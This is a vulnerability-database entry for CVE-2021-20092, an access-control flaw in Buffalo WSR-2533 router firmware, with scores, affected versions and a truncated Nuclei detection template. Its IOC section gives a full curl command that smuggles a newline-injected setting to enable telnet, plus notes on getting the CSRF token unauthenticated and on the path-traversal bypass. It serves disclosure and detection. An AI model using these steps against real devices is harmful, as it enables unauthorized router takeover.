CVE-2021-20092
Published: 2021-04-29

Priority: P2 · 76 · high · CVSS 3.1 base score 7.5
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Status: ITW exploit · VulnCheck KEV · Exploited in the wild
EPSS: 8.17% (94.2th percentile)
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| buffalo | wsr-2533dhp3-bk_firmware | <= 1.24 | — |
| buffalo | wsr-2533dhpl2-bk_firmware | <= 1.02 | — |
Detection & IOCs (extracted from sources)

command: `curl --include -X POST http://<router>/apply_abstract.cgi -H "Referer: http://<router>/ping.html" --data "action=start_ping&httoken=<token>&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4"`

yara matchers: word header 'application/x-javascript'; word body '/*DEMO*/' AND 'addCfg('

- The CSRF token parameter is named 'httoken' on Buffalo/Arcadyan devices; it is required for POST requests to /cgi/ endpoints and can be obtained unauthenticated from /loginerror.html via the getToken() JS function.
- The HTTP Server banner 'Arcadyan httpd 1.0' identifies vulnerable Arcadyan-based firmware across multiple vendor devices.
- CVE-2021-20091 chained exploit: POST to /apply_abstract.cgi with ARC_ping_ipaddress containing a newline (%0A) and ARC_SYS_TelnetdEnable=1 enables telnet on the device.
- CVE-2021-20091 and CVE-2021-20092 have only been confirmed on Buffalo WSR-2533 models, while CVE-2021-20090 (path traversal auth bypass) affects the broader list of Arcadyan-based devices.
- To have protected pages load properly through the bypass, proxy match/replace must be used so that all sub-resources also leverage the ..%2f path traversal prefix.
- Requests to /cgi/ endpoints will fail if the Referer header itself contains the ..%2f traversal string; the Referer must point to a clean path (e.g., /loginerror.html or /ping.html).
CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 7.5 | HIGH | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
| vulncheck | — | 7.5 | HIGH | — |
GHSA

GHSA-cvhf-3qg2-vgjx · ghsa_unreviewed · 2022-05-24
CVE-2021-20092 [HIGH] CWE-200
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
VulnCheck

vulncheck · 2021 · CVSS 7.5
CVE-2021-20092 [HIGH] buffalo wsr-2533dhpl2-bk_firmware Improper Authentication
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.

Affected: buffalo wsr-2533dhpl2-bk_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-02-25&host_type=src&vulnerability=cve-2021-20092; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-02-26&host_type=src&vulnerability=cve-2021-20092; https://dashboard.shadowserver.org/statistics/honey
No detection rules found.
Nuclei

nuclei · CVSS 8.8
CVE-2021-20092 [HIGH] Buffalo WSR-2533DHPL2 - Improper Access Control
The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.

Template:

```yaml
id: CVE-2021-20092

info:
  name: Buffalo WSR-2533DHPL2 - Improper Access Control
  author: gy741,pdteam,parth
  severity: high
  description: |
    The web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to the router's configuration settings and potentially compromise the entire network.
  remediation: |
    Apply the latest firmware up
```